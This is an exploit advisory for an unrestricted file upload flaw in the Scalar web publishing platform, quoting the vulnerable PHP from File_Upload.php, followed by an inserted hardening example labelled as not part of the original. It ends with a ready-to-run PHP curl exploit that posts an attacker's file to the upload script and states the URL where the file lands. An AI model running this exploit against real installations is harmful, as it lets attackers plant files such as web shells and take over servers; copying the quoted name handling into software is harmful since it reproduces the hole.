[-] Title : Scalar - Remote File Upload Vulnerability
[-] Author : Shahab Shamsi
[-] Vendor : http://scalar.usc.edu/scalar/
[-] Vendor1: https://github.com/anvc/scalar
[-] Category : Webapps
[-] Date : 07.April.2017
Vulnerable page :
/scalar/system/application/libraries/File_Upload.php
Vulnerable Source:
function uploadpagethumb($slug, $chmodMode)
    // ... (excerpt, shown in file order)
    $targetPath = confirm_slash(FCPATH) . confirm_slash($slug) . 'media';
    $name = $_FILES['source_file']['name'];   // file name supplied by the client
    // ...
    $targetName = substr_replace($name, "_thumb", strrpos($name, "."), 0);   // inserts "_thumb" before the last dot
    $targetFile = $targetPath . '/' . $targetName;   // client-supplied name reaches the target path
    // ...
    unlink($targetFile);
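Hardened file-name handling for the code above, as an added example that is not part of the original advisory or of the Scalar code base. It assumes thumbnails are limited to JPEG, PNG and GIF; safe_thumb_name() and THUMB_TYPES are hypothetical names.

```php
<?php
// Added example (hypothetical helper, not Scalar code): build the stored
// thumbnail name on the server instead of trusting $_FILES[...]['name'].

const THUMB_TYPES = [            // assumption: thumbnails are images only
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Returns a safe "<base>_thumb.<ext>" name, or null if the upload is rejected.
 * $clientName is $_FILES['source_file']['name'], $tmpPath is ...['tmp_name'].
 */
function safe_thumb_name(string $clientName, string $tmpPath): ?string
{
    // Accept only files that PHP itself received through an HTTP POST upload.
    if (!is_uploaded_file($tmpPath)) {
        return null;
    }
    // Decide the type from the file content, never from the client's name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(THUMB_TYPES[$mime])) {
        return null;
    }
    // The content must also parse as an image.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    // Drop any path component and every client-supplied extension
    // ("a.php.jpg" -> "a"), then keep a conservative character set.
    $leaf = basename(str_replace('\\', '/', $clientName));
    $base = preg_replace('/[^A-Za-z0-9_-]/', '', explode('.', $leaf)[0]);
    if ($base === '') {
        $base = bin2hex(random_bytes(8));   // e.g. for names such as ".htaccess"
    }
    // The extension comes from the allow-list, not from the request.
    return $base . '_thumb.' . THUMB_TYPES[$mime];
}

// Usage inside the upload handler (sketch):
//   $f = $_FILES['source_file'];
//   $targetName = safe_thumb_name($f['name'], $f['tmp_name']);
//   if ($targetName === null) { /* reject the request */ }
//   else { move_uploaded_file($f['tmp_name'], $targetPath . '/' . $targetName); }
```

The media directory should additionally be configured so the web server never executes scripts from it.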
Exploit :
<?php
$uploadfile="YourFileName";
$ch = curl_init("http://localhost:8282/scalar/system/application/libraries/File_Upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('source_file'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location :
http://localhost:8282/scalar/media/YourFileName
[-] Contact Me : SecurityMan.Org